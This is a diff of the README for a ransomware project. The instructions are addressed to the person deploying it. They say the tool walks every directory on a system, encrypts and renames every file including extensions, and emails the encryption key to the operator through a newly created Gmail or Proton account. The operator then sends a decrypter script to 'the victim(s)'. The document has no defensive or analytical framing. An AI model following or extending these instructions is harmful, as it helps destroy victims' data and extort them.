OldKokoroz/Ransom/README.md

 It will go through everything in the system

-  if it is a directory it will add it to the directories list
+-  If it is a directory it will add it to the directories list

-  if it is a file it will add it to the files list
+-  If it is a file it will add it to the files list

-  lastly, it will go through the directories and add files in that directory to the files list
+-  Lastly, it will go through the directories and add files in that directory to the files list

+-  Every file will be encrypted and renamed (even the extension)

-## Getting Key
+## Get the Key

-It is set to gmail by default (if you want to use proton just change port and smtp link)
+It is set to gmail by default (if you want to use proton or anything else just change the port and smtp link)

-Open up a new gmail account and Enter ...@gmail.com and password to the "_" , "_" in mail_send function at the end of the code
+Open up a new gmail account and Enter credentials to the email, password section

 ## To Decrypt

-Send the key that you got via mail to the victim and make them add the key into the DecryptKey.txt and run Decrypter.py
+- Change files and secret_key variables with the same variables you got via mail

+- Send decrypter.py to the victim(s)